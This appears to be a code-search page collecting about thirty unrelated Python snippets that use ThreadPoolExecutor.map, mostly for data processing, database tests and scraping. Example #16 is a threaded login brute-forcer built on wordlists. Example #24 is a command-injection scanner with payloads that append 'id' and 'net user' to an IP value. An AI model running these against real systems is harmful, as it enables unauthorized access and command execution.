コード例 #1
0
    def run(cls, dir_path: str):
        # 遍历文件的根目录
        spiders_root_path = app.config.get('DATA_ROOT_PATH')
        executor = ThreadPoolExecutor(max_workers=16)
        print("1111111111111111111", dir_path)
        if dir_path:
            files_path = spiders_root_path + '/{}/files'.format(dir_path)
            gov = Government.query.filter_by(dir_path=dir_path).first()

            queue = []
            # 遍历指定开放平台文件夹下数据存储文件夹, 数据集根目录
            for dataset_name in os.listdir(files_path):
                # cls.handel_dataset((files_path, dataset_name, gov.id))
                if len(queue) < 16:
                    queue.append((files_path, dataset_name, gov.id))
                else:
                    executor.map(cls.handel_dataset, queue)
                    queue = []
        else:
            for spider_name in os.listdir(spiders_root_path):
                files_path = spiders_root_path + '/{}/files'.format(
                    spider_name)
                gov = Government.query.filter_by(dir_path=spider_name).first()

                queue = []
                # 遍历指定开放平台文件夹下数据存储文件夹, 数据集根目录
                for dataset_name in os.listdir(files_path):
                    # cls.handel_dataset((files_path, dataset_name, gov.id))
                    if len(queue) < 16:
                        queue.append((files_path, dataset_name, gov.id))
                    else:
                        executor.map(cls.handel_dataset, queue)
                        queue = []
コード例 #2
0
def stream_multiple_processes(processes: List[Tuple[str, subprocess.Popen]]):
    colours = [rgb_to_logger_rgb(c) for c in get_n_colours(len(processes))]
    processes_to_stream = [
        ProcessToStream(process_name, process, colour)
        for (process_name, process), colour in zip(processes, colours)
    ]
    executor = ThreadPoolExecutor(max_workers=len(processes))
    executor.map(stream_process_output, processes_to_stream)
コード例 #3
0
def mat_vec(A: List[List[int]], x: List[int]) -> List[int]:
    N = len(A)
    y = [0] * N
    f = partial(calc, A=A, x=x, y=y)

    pool = ThreadPoolExecutor(max_workers=2)
    pool.map(f, [i for i in range(N)])
    pool.shutdown(True)

    return y
def _test_snow5871(conn_cnx,
                   db_parameters,
                   number_of_threads=10,
                   rt_max_outgoing_rate=60,
                   rt_max_burst_size=1,
                   rt_max_borrowing_limt=1000,
                   rt_reset_period=10000):
    """SNOW-5871: rate limiting for creation of non-recycable objects."""
    logger.debug(('number_of_threads = %s, rt_max_outgoing_rate = %s, '
                  'rt_max_burst_size = %s, rt_max_borrowing_limt = %s, '
                  'rt_reset_period = %s'), number_of_threads,
                 rt_max_outgoing_rate, rt_max_burst_size,
                 rt_max_borrowing_limt, rt_reset_period)
    with conn_cnx(user=db_parameters['sf_user'],
                  password=db_parameters['sf_password'],
                  account=db_parameters['sf_account']) as cnx:
        cnx.cursor().execute("""
alter system set
    RT_MAX_OUTGOING_RATE={},
    RT_MAX_BURST_SIZE={},
    RT_MAX_BORROWING_LIMIT={},
    RT_RESET_PERIOD={}""".format(rt_max_outgoing_rate, rt_max_burst_size,
                                 rt_max_borrowing_limt, rt_reset_period))

    try:
        with conn_cnx() as cnx:
            cnx.cursor().execute("create or replace database {name}_db".format(
                name=db_parameters['name']))
            meta = []
            for i in range(number_of_threads):
                meta.append({
                    'idx':
                    str(i + 1),
                    'cnx':
                    cnx,
                    'name':
                    db_parameters['name'] + 'tbl_5871_' + str(i + 1)
                })
            pool = ThreadPoolExecutor(number_of_threads)
            results = list(pool.map(_create_a_table, meta))
            success = 0
            for r in results:
                success += 1 if r['success'] else 0

            # at least one should be success
            assert success >= 1, 'success queries'
    finally:
        with conn_cnx() as cnx:
            cnx.cursor().execute("drop database if exists {name}_db".format(
                name=db_parameters['name']))

        with conn_cnx(user=db_parameters['sf_user'],
                      password=db_parameters['sf_password'],
                      account=db_parameters['sf_account']) as cnx:
            cnx.cursor().execute("""
alter system set
    RT_MAX_OUTGOING_RATE=default,
    RT_MAX_BURST_SIZE=default,
    RT_RESET_PERIOD=default,
    RT_MAX_BORROWING_LIMIT=default""")
コード例 #5
0
def indexResults(reslist,annopath=""):
    annopath="/root/data/gvision/dataset/raw_data/image_annos/person_bbox_test.json"
    # print('Loading test annotation json file: {}'.format(annopath))
    with open(annopath, 'r') as load_f:
        anno= json.load(load_f)
    # print("bboxex_num",len(reslist))#498
    indexedresults = defaultdict(list)
    # if test:
    #     tempannos={}
    #     imgfilters=imgfilters
    #     if imgfilters:
    #     # imgfilters=["15_24"]
    #         for imgfilter in imgfilters:
    #             tempannos.update({i:j for i,j in anno.items() if imgfilter in i })
    #         anno=tempannos
    def say(iss):
        filename, annodict=iss[0],iss[1]
        imageid = annodict['image id']
        for resdict in reslist:
            resimageid = resdict['image_id']
            if resimageid == imageid:
                indexedresults[imageid ].append(resdict)
        return indexedresults
    executor = ThreadPoolExecutor(max_workers=10)
    func_var = [[file_name,dict_value] for file_name,dict_value in anno.items()]
    pbar = tqdm(total=len(anno), ncols=50)
    for temp in executor.map(say,func_var):
        indexedresults.update(temp)
        pbar.update(1)
    pbar.close()
    results = indexedresults
    print("index bbox to self image")
    return results 
コード例 #6
0
def check_key_storage_free_keys_concurrency(key_storage):
    """Parallel tests to check the thread-safety of the storage regarding "free keys" booking."""
    key_type1 = "mytype1"
    key_type2 = "mytype2"

    for i in range(77):
        for key_type in (key_type1, key_type2):
            key_storage.add_free_keypair(key_type=key_type, public_key=b"whatever1", private_key=b"whatever2")

    def retrieve_free_keypair_for_index(idx, key_type):
        keychain_uid = uuid.UUID(int=idx)
        try:
            key_storage.attach_free_keypair_to_uuid(keychain_uid=keychain_uid, key_type=key_type)
            time.sleep(0.001)
            public_key_content = key_storage.get_public_key(keychain_uid=keychain_uid, key_type=key_type)
            assert public_key_content == b"whatever1"
            res = True
        except KeyDoesNotExist:
            res = False
        return res

    executor = ThreadPoolExecutor(max_workers=20)

    for key_type in (key_type1, key_type2):
        results_gen = executor.map(functools.partial(retrieve_free_keypair_for_index, key_type=key_type), range(200))
        results = list(results_gen)
        assert results.count(True) == 77
        assert results.count(False) == 123

    assert key_storage.get_free_keypairs_count(key_type=key_type1) == 0
    assert key_storage.get_free_keypairs_count(key_type=key_type2) == 0
    return locals()
コード例 #7
0
def test_race_in_success_callback(
    fixtures: CommonFixtures,
    callbacks: Callbacks,
    transactional_db,
):
    """
    Выполняет много депозитов в 100 тредов.
    Проверяет что нет состояния гонки в
    пополнениях/списаниях баланса
    """

    pool = ThreadPoolExecutor(10)

    tasks = [random.randrange(1, 100, 1) for _ in range(100)]
    total_amount = sum(tasks)
    old_value = fixtures.wallet_rub.balance

    @transaction.atomic()
    def work(amount):
        tr = TransactionFactory(
            wallet=fixtures.wallet_rub,
            status=TransactionStatus.PROCESSING,
            amount=amount,
            type=TransactionTypes.DEPOSIT,
        )
        callbacks.success(tr)

    list(pool.map(work, tasks))
    fixtures.wallet_rub.refresh_from_db()
    assert fixtures.wallet_rub.balance == old_value + total_amount
コード例 #8
0
    def _multiprocessing_badges(self, multiprocess: bool = True) -> None:
        """
        Get the badges using single or multi processing.
        :type multiprocess: bool
        :param multiprocess: If it's true then use multiprocessing other wise use a single processor.
        :rtype: None
        :return: None
        """
        from concurrent.futures.thread import ThreadPoolExecutor
        from time import time
        if multiprocess is False:
            for url in self._urls:
                self._badges_id += self._request_urls(url)
        else:
            init_time = time()
            processors = self._max_workers
            if processors:
                number_of_urls = len(self._urls)
                if number_of_urls <= 0:
                    processors = None
                elif number_of_urls < processors:
                    processors = number_of_urls

            executor = ThreadPoolExecutor(processors)
            pages_with_badges = executor.map(self._request_urls, self._urls)

            difference = int(time() - init_time)
            print('# -------------------------------------------')
            print('# Execution time: ', difference)
            print('# -------------------------------------------')
            for badges_id in pages_with_badges:
                self._badges_id += badges_id
        self._number_of_badges = len(self._badges_id)
コード例 #9
0
    def _upload_files_in_parallel(self, file_metas):
        """Uploads files in parallel.

        Args:
            file_metas: List of metadata for files to be uploaded.
        """
        idx = 0
        len_file_metas = len(file_metas)
        while idx < len_file_metas:
            end_of_idx = idx + self._parallel if \
                idx + self._parallel <= len_file_metas else \
                len_file_metas

            logger.debug('uploading files idx: {}/{}'.format(
                idx + 1, end_of_idx))

            target_meta = file_metas[idx:end_of_idx]
            while True:
                pool = ThreadPoolExecutor(len(target_meta))
                results = list(
                    pool.map(SnowflakeFileTransferAgent.upload_one_file,
                             target_meta))
                pool.shutdown()

                # need renew AWS token?
                retry_meta = []
                for result_meta in results:
                    if result_meta['result_status'] in [
                            ResultStatus.RENEW_TOKEN,
                            ResultStatus.RENEW_PRESIGNED_URL
                    ]:
                        retry_meta.append(result_meta)
                    else:
                        self._results.append(result_meta)

                if len(retry_meta) == 0:
                    # no new AWS token is required
                    break
                if any([
                        result_meta['result_status'] ==
                        ResultStatus.RENEW_TOKEN for result_meta in results
                ]):
                    client = self.renew_expired_client()
                    for result_meta in retry_meta:
                        result_meta['client'] = client
                    if end_of_idx < len_file_metas:
                        for idx0 in range(idx + self._parallel,
                                          len_file_metas):
                            file_metas[idx0]['client'] = client
                if any([
                        result_meta['result_status'] ==
                        ResultStatus.RENEW_PRESIGNED_URL
                        for result_meta in results
                ]):
                    self._update_file_metas_with_presigned_url()
                target_meta = retry_meta

            if end_of_idx == len_file_metas:
                break
            idx += self._parallel
コード例 #10
0
ファイル: novel.py プロジェクト: GitLeftZhou/learnPython
    def concurrent_spider(self, novel_name, bgn_idx, max_workers):
        """
        并行方式获取
        :param novel_name: 文件名
        :param bgn_idx: 起始章节序号
        :param max_workers: 并行数
        :return:
        """
        try:
            filename = novel_name + ".txt"
            path = "files/"
            if not os.path.isdir(path):
                os.mkdir(path)
            # 初始化线程池
            executor = ThreadPoolExecutor(max_workers=max_workers)
            with open(path + filename, 'w', encoding='utf-8') as f:
                f.write(str(novel_name) + self.menu_url + '\n')  # 写入文件名并换行
                # 使用线程池map方式执行, 可以顺序的获取到结果
                for content in executor.map(self.__get_content,
                                            range(bgn_idx, len(self.urls)),
                                            self.urls[bgn_idx:]):
                    f.write(content + '\r\n')  # 追加内容 换行

        except Exception as ex:
            print("保存小说时发生异常", ex)
            return False
        return True
コード例 #11
0
class CssDownloader(object):
    def __init__(self):
        self.css_start_token = None
        self.css_end_token = None
        self._executor = ThreadPoolExecutor(4)
        self._results = []

    def fetch_css_files(self, base_url, css_start_token, css_end_token, urls):
        #  type: (Text, Text, Text, List[Text]) -> None
        if not is_absolute_url(base_url):
            logger.info("Base URL is not an absolute URL!")
        assert self.css_start_token is None or self.css_start_token == css_start_token
        assert self.css_end_token is None or self.css_end_token == css_end_token
        self.css_start_token = css_start_token
        self.css_end_token = css_end_token
        nodes = [CssNode.create(base_url, url) for url in urls]
        futures = self._executor.map(_download_jsonify_node,
                                     urls,
                                     nodes,
                                     timeout=CSS_DOWNLOAD_TIMEOUT)
        self._results.append(futures)

    def results(self):
        # type: () -> Dict[Text, Text]
        return {url: data for url, data in chain(*self._results)}

    def __enter__(self):
        self._executor.__enter__()
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        return self._executor.__exit__(exc_type, exc_val, exc_tb)
コード例 #12
0
def model_fusion(outpath,outfile):
    resultsa1,resultsa2,resultsa3,resultsa4=results_resolve(model_path="/root/data/gvision/my_merge/finalsubmission/fafafinal/det_results.json",weight=1)
    resultsb1,resultsb2,resultsb3,resultsb4=results_resolve(model_path="/root/data/gvision/my_merge/finalsubmission/final2/all.json",weight=0.6)
    annopath="/root/data/gvision/dataset/raw_data/image_annos/person_bbox_test.json"
    # for i in zip(list(resulta1,resulta2,resulta3,resulta4),list(resultb1,resultb2,resultb3,resultb4)):
    results1=resultsa1+resultsb1
    results2=resultsa2+resultsb2
    results3=resultsa3+resultsb3
    results4=resultsa4+resultsb4
    print('Loading split annotation json file: {}'.format(annopath))
    with open(annopath, 'r') as load_f:
        srcanno = json.load(load_f)
    indexedresults=indexResults(results1,anno=srcanno)
    mergedresults = defaultdict(list)
    for (filename, objlist) in indexedresults.items():
        # print("filename",filename)
        # print("srcfile, paras",srcfile, paras )
        srcfile = filename.replace('_IMG', '/IMG')#02_Xili_Crossroad_IMG_02_01___0.5__0__0.jpg
        srcimageid = srcanno[srcfile]['image id']
        for objdict in objlist:
            mergedresults[srcimageid].append([objdict['bbox'][0],objdict['bbox'][1],objdict['bbox'][2],objdict['bbox'][3],objdict['score'], objdict['category_id']])
    for (imageid, objlist) in mergedresults.items():
        print(imageid,objlist)
        # masxlist=[i[2]*i[3] for i in objlist]
        # max_wh=np.max(masxlist)
        # objlist=[[i[0],i[1],i[2],i[3],i[4]*0.05+i[3]*i[2]*0.95/max_wh,i[5],i[6]] for i in objlist ]
        keep = py_cpu_nms(np.array(objlist),0.5)
        outdets = []
        for index in keep:
            outdets.append(objlist[index])
        mergedresults[imageid] = outdets
    savelist = []
    def say2(iss):
        imageid, objlist=iss[0],iss[1]
        # print(imageid, objlist)
        templist=[]
        for obj in objlist:#obj [22528, 1270, 24576, 1, 1.0, 4]
            # print(obj)
            templist.append({
                "image_id": imageid,
                "category_id": obj[5],
                "bbox": obj[:4],
                # "bbox": tlbr2tlwh(obj[:4]),
                "score": obj[4]
            })
        return templist
    executor = ThreadPoolExecutor(max_workers=80)
    func_var = [[file_name,dict_value] for file_name,dict_value in mergedresults.items()]

    print("fusion bbox into self'image start ")
    pbar2= tqdm(total=len(mergedresults), ncols=50)
    for temp in executor.map(say2,func_var):
        savelist+=temp
        pbar2.update(1)
    pbar2.close()
    with open(os.path.join(outpath, outfile), 'w') as f:
        dict_str = json.dumps(savelist, indent=2)
        f.write(dict_str)
        print(f"save ***results*** json :{os.path.join(outpath, outfile)}")
コード例 #13
0
def thread_task(args):
    items = []
    start, end = args[0], args[1] + 1
    executor = ThreadPoolExecutor(max_workers=4)
    for item in executor.map(bd_spider.fetch_one, list(range(start, end))):
        if item is not None:
            items.append(item)
    return items
コード例 #14
0
ファイル: test_search.py プロジェクト: lyfb/search_images
def test_search_by_thread_pool():
    search_paths = get_search_paths()
    pool = ThreadPoolExecutor(max_workers=12)
    start = time.time()
    result = list(pool.map(count_right_by_path, search_paths))
    end = time.time()
    print(sum(result) / 100)  # vgg16 准确率0.99
    print('使用多线程--timestamp:{:.3f}'.format(end-start))  # vgg16 83.691
def checkAllIpsByMultiThreading(fileName):
    from util import FileUtil
    ips = FileUtil.readIPsFromFile(fileName)
    executor = ThreadPoolExecutor(NO_OF_PROCESS)
    results = executor.map(getIPPingStatus, ips)
    dataList = list(results)
    for i in dataList:
        print(i)
コード例 #16
0
def main(addr, headers):
    usernames = read_file(os.path.join(BASE_DIR, 'user.txt'))
    passwords = read_file(os.path.join(BASE_DIR, 'password.txt'))
    datas = itertools.product([addr], usernames, passwords, [headers])

    executor = ThreadPoolExecutor(max_workers=WORKERS)
    for success, username, password in executor.map(brute_force, datas):
        if success:
            print('+', username, password)
コード例 #17
0
def test_concurrent_insert(conn_cnx, db_parameters):
    """Concurrent insert tests. Inserts block on the one that's running."""
    number_of_threads = 22  # change this to increase the concurrency
    expected_success_runs = number_of_threads - 1
    cnx_array = []

    try:
        with conn_cnx() as cnx:
            cnx.cursor().execute("""
create or replace warehouse {}
warehouse_type=standard
warehouse_size=small
""".format(db_parameters['name_wh']))
            sql = """
create or replace table {name} (c1 integer, c2 string)
""".format(name=db_parameters['name'])
            cnx.cursor().execute(sql)
            for i in range(number_of_threads):
                cnx_array.append({
                    'host': db_parameters['host'],
                    'port': db_parameters['port'],
                    'user': db_parameters['user'],
                    'password': db_parameters['password'],
                    'account': db_parameters['account'],
                    'database': db_parameters['database'],
                    'schema': db_parameters['schema'],
                    'table': db_parameters['name'],
                    'idx': str(i),
                    'warehouse': db_parameters['name_wh']
                })

            pool = ThreadPoolExecutor(number_of_threads)
            results = list(pool.map(
                _concurrent_insert,
                cnx_array))
            pool.shutdown()
            success = 0
            for record in results:
                success += 1 if record['success'] else 0

            # 21 threads or more
            assert success >= expected_success_runs, "Number of success run"

            c = cnx.cursor()
            sql = "select * from {name} order by 1".format(
                name=db_parameters['name'])
            c.execute(sql)
            for rec in c:
                logger.debug(rec)
            c.close()

    finally:
        with conn_cnx() as cnx:
            cnx.cursor().execute(
                "drop table if exists {}".format(db_parameters['name']))
            cnx.cursor().execute(
                "drop warehouse if exists {}".format(db_parameters['name_wh']))
コード例 #18
0
ファイル: scraper.py プロジェクト: novucs/papertool
def scrape_google(paper: str, executor: ThreadPoolExecutor):
    urls = list(googlesearch.search(f'"bibtex" {paper}', stop=10))
    all_references = []
    all_dois = []

    for references, dois in executor.map(scrape_web_page, urls):
        all_references.extend(references)
        all_dois.extend(dois)

    return all_references, all_dois
コード例 #19
0
ファイル: scraper.py プロジェクト: novucs/papertool
def scrape_paper(paper: str, executor: ThreadPoolExecutor):
    if '/' in paper and paper.endswith('.pdf'):
        # Attempt to download and parse a pdf and its title from a potential url
        try:
            response = requests.get(paper, stream=True)
            pdf = tika.parser.from_buffer(response.raw)
            lines = pdf['content'].strip().splitlines()
            seen_caps = False
            for line, _ in zip(reversed(lines[:PDF_TITLE_CHECK_DEPTH]),
                               range(PDF_TITLE_CHECK_DEPTH)):
                if not line.strip():
                    continue
                if line.isupper():
                    seen_caps = True
                    paper = line
                if not seen_caps:
                    paper = line
        except IOError:
            pass

    # Search arxiv
    searchable_paper_name = re.sub(r'[^a-zA-Z0-9\s]+', ' ', paper).lower()
    result = next(
        iter(arxiv.query(f'ti:"{searchable_paper_name}"', max_results=1)),
        None)
    references = []

    if result:
        authors = join_authors(result['authors'])
        year = result['published_parsed'].tm_year
        title = result['title']
        journal = 'arXiv Preprint'
        volume, issue = result['id'].split('/')[-1].split('v')
        pages = None
        accessed = datetime.now().strftime('[Accessed %d %B %y]')
        url = result['pdf_url']
        references.append(
            JournalReference(authors, year, title, journal, volume, issue,
                             pages, accessed, url, JournalType.ELECTRONIC))

        # Search doi if exists
        doi = result['doi']
        if doi:
            reference = scrape_doi(doi)
            if reference:
                references.append(reference)

    # Search google
    google_references, google_dois = scrape_google(paper, executor)
    references.extend(google_references)

    # Search all DOIs found from Google
    references.extend(executor.map(scrape_doi, google_dois))

    return sorted_references(list(filter(None, set(references))), paper)
コード例 #20
0
    def indexResults(self):
        print('Loading result json file: {}'.format(self.respath))
        with open(self.respath, 'r') as load_f:
            reslist = json.load(load_f)
        print("bboxex_num", len(reslist))  #498
        print('Loading split annotation json file: {}'.format(
            self.splitannopath))
        with open(self.splitannopath, 'r') as load_f:
            splitanno = json.load(load_f)
        indexedresults = defaultdict(list)
        if self.test:
            tempannos = {}
            imgfilters = self.imgfilters
            # imgfilters=["15_24"]
            for imgfilter in imgfilters:
                tempannos.update(
                    {i: j
                     for i, j in splitanno.items() if imgfilter in i})
            splitanno = tempannos

        def say(iss):
            filename, annodict = iss[0], iss[1]
            imageid = annodict['image id']
            # print("imageid",imageid)
            for resdict in reslist:
                resimageid = resdict['image_id']
                if resimageid == imageid:
                    # print("1111",resdict) {'image_id': 253, 'category_id': 1, 'bbox': [981.3349609375, 322.8221435546875, 22.030517578125, 32.01666259765625], 'score': 0.16039377450942993}
                    # print("2222",resimageid)
                    # print("1111",type(resdict))
                    # print("2222",type(resimageid))
                    indexedresults[filename].append(resdict)

            return indexedresults

        # print("splitanno",splitanno)
        executor = ThreadPoolExecutor(max_workers=1)
        func_var = [[file_name, dict_value]
                    for file_name, dict_value in splitanno.items()]
        pbar = tqdm(total=len(splitanno), ncols=50)
        for temp in executor.map(say, func_var):
            # print(temp)
            indexedresults.update(temp)
            pbar.update(1)
        pbar.close()
        self.results = indexedresults
        np.save(
            f"/root/data/gvision/CrowdDet-master/model/rcnn_emd_refine/outputs/coco_results/{self.npyname}.npy",
            indexedresults)
        print(
            "save ***index.npy*** as :",
            f"/root/data/gvision/CrowdDet-master/model/rcnn_emd_refine/outputs/coco_results/{self.npyname}.npy"
        )
コード例 #21
0
def test_concurrent_insert_using_connection(conn_cnx, db_parameters):
    """
    Concurrent insert tests using the same connection
    """
    try:
        with conn_cnx() as cnx:
            cnx.cursor().execute("""
create or replace warehouse {}
warehouse_type=standard
warehouse_size=small
""".format(db_parameters['name_wh']))
            cnx.cursor().execute("""
CREATE OR REPLACE TABLE {name} (c1 INTEGER, c2 STRING)
""".format(name=db_parameters['name']))
            number_of_threads = 5
            metas = []
            for i in range(number_of_threads):
                metas.append({
                    'connection': cnx,
                    'idx': i,
                    'name': db_parameters['name'],
                })
            pool = ThreadPoolExecutor(number_of_threads)
            pool.map(_concurrent_insert_using_connection, metas)
            pool.shutdown()
            cnt = 0
            for _ in cnx.cursor().execute(
                    "SELECT * FROM {name} ORDER BY 1".format(
                        name=db_parameters['name'])):
                cnt += 1
            assert cnt <= number_of_threads, \
                "Number of records should be less than the number of threads"
            assert cnt > 0, \
                "Number of records should be one or more number of threads"
    finally:
        with conn_cnx() as cnx:
            cnx.cursor().execute("drop table if exists {}".format(
                db_parameters['name']))
            cnx.cursor().execute("drop warehouse if exists {}".format(
                db_parameters['name_wh']))
コード例 #22
0
    def load_config(self, conf_path):
        if not os.path.isdir(conf_path):
            self._logger.error('Applications not configured in %s', conf_path)
            conf_path = os.path.join('/etc', 'huey.multitenant.conf')

        if not os.path.isdir(conf_path):
            self._logger.error('Applications not configured in %s', conf_path)
            sys.exit(1)

        all_conf = (conf for conf in os.listdir(conf_path) if conf.endswith('.conf'))

        pool = ThreadPoolExecutor(16)
        instances = pool.map(lambda conf: self._load_instances_from_conf(conf, conf_path), all_conf)
        self.instances = [instance for instance in instances if instance is not None]
        pool.shutdown()
        if len(self.instances) == 0:
            self._logger.error('Check that you have almost one application configured in %s', conf_path)
            sys.exit(1)
コード例 #23
0
    def splitdata(self, scale, imgrequest=None, imgfilters=[]):
        """
        :param scale: resize rate before cut
        :param imgrequest: list, images names you want to request, eg. ['1-HIT_canteen/IMG_1_4.jpg', ...]
        :param imgfilters: essential keywords in image name
        """
        if imgrequest is None or not isinstance(imgrequest, list):
            imgnames = list(self.annos.keys())
        else:
            imgnames = imgrequest

        splitannos = {}
        img_list = []
        for imgname in imgnames:
            iskeep = False
            for imgfilter in imgfilters:
                if imgfilter in imgname:
                    iskeep = True
            if imgfilters and not iskeep:
                continue
            img_list.append(imgname)

        def split_img(imgname):
            splitdict = self.SplitSingle(imgname, scale)
            return splitdict

        executor = ThreadPoolExecutor(max_workers=10)
        for splitdict in executor.map(split_img, img_list):
            # for img in img_list:
            #     splitdict = split_img(img)
            splitannos.update(splitdict)
        # add image id
        imgid = 1
        for imagename in splitannos.keys():
            splitannos[imagename]['image id'] = imgid
            imgid += 1
        # save new annotation for split images
        outdir = os.path.join(self.outannopath, self.outannofile)
        with open(outdir, 'w', encoding=self.code) as f:
            dict_str = json.dumps(splitannos, indent=2)
            f.write(dict_str)
コード例 #24
0
def main(addr, headers):
    payloads = [
        {
            'name':
            'id',
            'pattern':
            r'uid=\d',
            'payloads': [
                '127.0.0.1;id;',
                '127.0.0.1&&id',
                '127.0.0.1&;&id',
                '127.0.0.1&id',
                '127.0.0.1|id',
                'testcmdinjection||id',
                'testcmdinjection|;|id',
                'testcmdinjection|id',
                'testcmdinjection&id',
            ]
        },
        {
            'name':
            'netuser',
            'pattern':
            r'administrator',
            'payloads': [
                'testcmdinjection||net user',
                'testcmdinjection|;|net user',
                'testcmdinjection|net user',
                'testcmdinjection&net user',
                '127.0.0.1&&net user',
                '127.0.0.1&;&net user'
                '127.0.0.1&net user',
                '127.0.0.1|net user',
            ]
        },
    ]
    datas = itertools.product([addr], [headers], payloads)
    executor = ThreadPoolExecutor(max_workers=WORKERS)
    for success, name, payload in executor.map(injection, datas):
        if success:
            print('+ name:', name, ', payload:', payload)
コード例 #25
0
    def test_qinvoke_context_delete(self):
        executor = ThreadPoolExecutor(max_workers=1)
        context = QObject()
        isdeleted = False
        lastindex = -1

        def mark_deleted():
            nonlocal isdeleted
            isdeleted = True

        def delete(qobj: QObject):
            assert qobj.thread() is QThread.currentThread()
            spy = QSignalSpy(qobj.destroyed)
            qobj.deleteLater()
            QCoreApplication.sendPostedEvents(qobj, QEvent.DeferredDelete)
            assert len(spy) == 1

        context.destroyed.connect(mark_deleted)

        def func(i):
            nonlocal isdeleted
            nonlocal lastindex
            lastindex = i
            self.assertFalse(isdeleted)
            self.assertIs(context.thread(), self.app.thread())

        callback = qinvoke(func, context=context)

        _ = executor.map(callback, range(1000))

        while lastindex < 0:
            QTest.qWait(10)
        assert lastindex >= 0
        delete(context)
        assert isdeleted
        lasti = lastindex
        QTest.qWait(50)
        assert lasti == lastindex
        executor.shutdown()
コード例 #26
0
def indexResults(reslist,anno):
    print("bboxex_num",len(reslist))#498
    indexedresults = defaultdict(list)
    # if test:
    #     tempannos={}
    #     imgfilters=imgfilters
    #     if imgfilters:
    #     # imgfilters=["15_24"]
    #         for imgfilter in imgfilters:
    #             tempannos.update({i:j for i,j in anno.items() if imgfilter in i })
    #         anno=tempannos
    def say(iss):
        filename, annodict=iss[0],iss[1]
        imageid = annodict['image id']
        # print("imageid",imageid)
        for resdict in reslist:
            resimageid = resdict['image_id']
            if resimageid == imageid:
                # print("1111",resdict) {'image_id': 253, 'category_id': 1, 'bbox': [981.3349609375, 322.8221435546875, 22.030517578125, 32.01666259765625], 'score': 0.16039377450942993}
                # print("2222",resimageid)
                # print("1111",type(resdict))
                # print("2222",type(resimageid))
                indexedresults[filename].append(resdict)

        return indexedresults
    # print("anno",anno)
    executor = ThreadPoolExecutor(max_workers=1)
    func_var = [[file_name,dict_value] for file_name,dict_value in anno.items()]
    pbar = tqdm(total=len(anno), ncols=50)
    for temp in executor.map(say,func_var):
        # print(temp)
        indexedresults.update(temp)
        pbar.update(1)
    pbar.close()
    results = indexedresults
    return results 
コード例 #27
0
def cal2():
    from concurrent.futures.thread import ThreadPoolExecutor
    pool = ThreadPoolExecutor(max_workers=4)
    result = list(pool.map(gcd, numbers))
    return result
コード例 #28
0
print(f'length of read ids is {len(ids)}')

if len(ids) != 0:
    for i in range(0, 1000, 100):
        idsChunk = ids[i:i + 100]
        resultSet = es.mtermvectors(index="trec-news-index",
                                    doc_type="_doc",
                                    body=dict(ids=idsChunk,
                                              parameters=dict(
                                                  term_statistics=True,
                                                  fields=["text"])))['docs']
        print(f'len(resultSet) is {len(resultSet)}')
        #getTermWeights(doc for doc in resultSet)
        proc = ThreadPoolExecutor()
        proc.map(getTermWeights, [doc for doc in resultSet])
        '''
        
        #print(f'fn_result type is {type(fn_result)}')
        #print(f'fn_result here is {fn_result}')
        print(f'actions here is {actions}')
        print(f'actions type here is {type(actions)}')
        list_len = len(actions)
        print(f'length of action {len(actions)}')
        if list_len !=0 and (list_len-previous_count)>=99:
            print(f"length of actions here{len(actions)}")
            indexData(actions=actions)
            print(f'indexed now {len(actions)} and counter value is {counter}')
            actions = []
            previous_count = list_len
        '''
コード例 #29
0
ファイル: execl_config.py プロジェクト: lw000/new_python_demo
    people1.address = '广东省深圳市宝安区西乡芬达科技园对面雅居园11单元1202'
    people1.birthday = '19860526'
    people1.IDcardNo = '450332198605264124'
    print(people)
    print(people1)
    
    people2 = copy.deepcopy(people)
    people2.name = '李诗彤'
    people2.age = 5
    people2.sex = 0
    people2.address = '广东省深圳市宝安区西乡芬达科技园对面雅居园11单元1202'
    print(people)
    print(people2)
            
    executor = ThreadPoolExecutor(3)
    result = executor.map(test_func, [4, 7, 1], [4, 7, 1])
    for v in result:
        print(v)
                
    L = fab(10)
    for i, v in enumerate(L):
        print(v)
        
#     for i in range(len(L)-1):
#         print('%d/%d=%.30f' % (L[i], L[i+1], L[i]/L[i+1]))

    print('--------------------------------------------------------------------')

    for v in fab_gen(10):
        print(v)
        
コード例 #30
0
for t in threads:
    add(t.result())
end_time=time.time()
print("the whole process finished in {} seconds".format(end_time-start_time))
print("#####################################first block#############################################")
#####################################first block#############################################

#####################################second block#############################################
print("#####################################second block#############################################")
second_start_time=time.time()
another_bunch_of_threads=[executor.submit(func1,sec) for sec in secs]
futures=concurrent.futures.as_completed(another_bunch_of_threads)
for f in futures:
    add(f.result())
second_end_time=time.time()
print("Second process end in {} seconds".format(second_end_time-second_start_time))
print("#####################################second block#############################################")
#####################################second block#############################################

#####################################third block#############################################
print("#####################################third block#############################################")
third_start_time=time.time()
third_bunch_of_threads=executor.map(func1,secs)
for result in third_bunch_of_threads:
    add(result)
third_end_time=time.time()
print("Third process end in {} seconds".format(third_end_time-third_start_time))
print("#####################################third block#############################################")
#####################################third block#############################################

コード例 #31
0
ファイル: test_utils.py プロジェクト: leeopop/coexecutor
def do_test3(workers):
    param = {"max_workers": workers}
    loop = asyncio.new_event_loop()

    lock = threading.Lock()
    tresult = []
    presult = []
    cresult = []

    pre_input1 = input_generator(workers, 0)
    pre_input2 = input_generator(workers, max(pre_input1))
    pre_input3 = input_generator(workers, max(pre_input2))

    def result_checker(list, lock, fut):
        with lock:
            try:
                list.append(fut.result())
            except Exception as e:
                list.append(e)

    texec = ThreadPoolExecutor(**param)
    pexec = ProcessPoolExecutor(**param)
    cexec = CoroutinePoolExecutor(**param, loop=loop)

    tstart = round(time.time()+1)
    input1 = [tstart + i for i in pre_input1]
    input2 = [tstart + i for i in pre_input2]
    input3 = [tstart + i for i in pre_input3]

    for x in input1:
        future = texec.submit(wake_at, x)
        future.add_done_callback(
            functools.partial(result_checker, tresult, lock))
    result_iter = texec.map(wake_at, input2)
    for x in input3:
        future = texec.submit(wake_at, x)
        future.add_done_callback(
            functools.partial(result_checker, tresult, lock))
    for x in result_iter:
        with lock:
            tresult.append(x)

    texec.shutdown(True)

    pstart = round(time.time() + _start_warm_up)
    input1 = [pstart + i for i in pre_input1]
    input2 = [pstart + i for i in pre_input2]
    input3 = [pstart + i for i in pre_input3]

    for x in input1:
        future = pexec.submit(wake_at, x)
        future.add_done_callback(
            functools.partial(result_checker, presult, lock))
    result_iter = pexec.map(wake_at, input2)
    for x in input3:
        future = pexec.submit(wake_at, x)
        future.add_done_callback(
            functools.partial(result_checker, presult, lock))
    for x in result_iter:
        with lock:
            presult.append(x)

    pexec.shutdown(True)

